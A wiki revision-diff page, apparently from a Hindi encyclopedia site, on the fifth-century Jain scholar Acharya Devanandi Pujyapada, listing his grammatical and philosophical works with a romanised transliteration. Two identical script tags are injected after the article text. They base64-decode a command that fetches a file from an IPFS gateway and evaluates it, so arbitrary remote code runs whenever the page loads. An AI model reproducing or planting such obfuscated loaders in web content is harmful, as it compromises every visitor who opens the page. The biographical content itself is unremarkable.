Difference between revisions of "देवनन्दि पूज्यपाद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "विद्वान " to "विद्वान् ")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
'''आचार्य देवनन्दि पूज्यपाद'''<br />
 
'''आचार्य देवनन्दि पूज्यपाद'''<br />
*आचार्य देवनन्दि-पूज्यपाद [[विक्रम सम्वत]] की छठीं और ईसा की पाँचवीं शती के बहुश्रुत विद्वान हैं।  
+
*आचार्य देवनन्दि-पूज्यपाद [[विक्रम सम्वत]] की छठीं और ईसा की पाँचवीं शती के बहुश्रुत विद्वान् हैं।  
 
*ये तार्किक, वैयाकरण, कवि और स्तुतिकार हैं।  
 
*ये तार्किक, वैयाकरण, कवि और स्तुतिकार हैं।  
 
*तत्त्वार्थसूत्र पर लिखी गयी विशद व्याख्या सर्वार्थसिद्धि में इनकी दार्शनिकता और तार्किकता अनेक स्थलों पर उपलब्ध होती है।  
 
*तत्त्वार्थसूत्र पर लिखी गयी विशद व्याख्या सर्वार्थसिद्धि में इनकी दार्शनिकता और तार्किकता अनेक स्थलों पर उपलब्ध होती है।  
 
*इनका एक न्याय-ग्रन्थ 'सार-संग्रह' रहा है, जिसका उल्लेख [[आचार्य वीरसेन]] ने किया है और उनमें दिये गये नयलक्षण को धवला-टीका में उद्धृत किया है।  
 
*इनका एक न्याय-ग्रन्थ 'सार-संग्रह' रहा है, जिसका उल्लेख [[आचार्य वीरसेन]] ने किया है और उनमें दिये गये नयलक्षण को धवला-टीका में उद्धृत किया है।  
 
*जैनेन्द्रव्याकरण, समाधिशतक, इष्टोपदेश, निर्वाणभक्ति आदि अनेक रचनाएँ भी इन्होंने लिखी हैं।
 
*जैनेन्द्रव्याकरण, समाधिशतक, इष्टोपदेश, निर्वाणभक्ति आदि अनेक रचनाएँ भी इन्होंने लिखी हैं।
 +
{{प्रचार}}
 +
==संबंधित लेख==
 +
{{जैन धर्म2}}
 +
{{जैन धर्म}}
 
[[Category:दर्शन कोश]]
 
[[Category:दर्शन कोश]]
 
[[Category:जैन_दर्शन]]
 
[[Category:जैन_दर्शन]]
 
__INDEX__
 
__INDEX__
{{जैन दर्शन}}
 

Latest revision as of 14:20, 6 July 2017

achary devanandi poojyapad

  • achary devanandi-poojyapad vikram samvat ki chhathian aur eesa ki paanchavian shati ke bahushrut vidvanh haian.
  • ye tarkik, vaiyakaran, kavi aur stutikar haian.
  • tattvarthasootr par likhi gayi vishad vyakhya sarvarthasiddhi mean inaki darshanikata aur tarkikata anek sthaloan par upalabdh hoti hai.
  • inaka ek nyay-granth 'sar-sangrah' raha hai, jisaka ullekh achary virasen ne kiya hai aur unamean diye gaye nayalakshan ko dhavala-tika mean uddhrit kiya hai.
  • jainendravyakaran, samadhishatak, ishtopadesh, nirvanabhakti adi anek rachanaean bhi inhoanne likhi haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>